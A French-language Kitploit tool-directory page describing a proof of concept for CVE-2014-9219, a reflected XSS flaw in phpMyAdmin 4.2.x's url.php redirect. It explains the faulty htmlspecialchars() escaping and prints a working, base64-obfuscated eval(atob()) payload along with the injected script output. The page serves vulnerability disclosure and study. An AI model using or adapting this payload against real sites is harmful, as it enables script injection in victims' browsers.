Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/mohmadhafiz/cve-2014-9219
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubmohmadhafiz/cve-2014-9219

CVE-2014-9219

CVE-2014-9219 POC XSS

Voir le dépôt
il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2014-9219

CVE-2014-9219 XSS POC

À propos

La vulnérabilité est causée par une erreur de validation d'entrée dans la fonction de redirection dans url.php dans phpMyAdmin 4.2.x avant 4.2.13.1 lors du traitement du paramètre url. Un attaquant distant peut inciter la victime à suivre un lien spécialement conçu et exécuter du code HTML et script arbitraire dans le navigateur de la victime dans le contexte de sécurité du site web vulnérable.

Version affectée

phpMyAdmin: 4.2.0 - 4.2.13

Problème

Le code vulnérable utilise htmlspecialchars() pour nettoyer le paramètre URL avant de l'insérer dans un contexte de chaîne JavaScript :

root@kitploit:~
window.location='" . htmlspecialchars($_GET['url']) . "';

htmlspecialchars() est conçu pour le contexte HTML, pas pour le contexte de chaîne JavaScript. Il n'échappe pas correctement les caractères qui peuvent sortir des littéraux de chaîne JavaScript.

voir le commit

POC

url encodé :

root@kitploit:~
url.php?url=http%3A%2F%2Fwww.phpmyadmin.net%2F'%2beval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))%2b'
Télécharger l’outil

url décodé :

root@kitploit:~
url.php?url=http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'

Sortie HTML :

root@kitploit:~
<script type='text/javascript'>
            window.onload=function(){
                window.location='http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'';
            }
        </script>Taking you to http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'.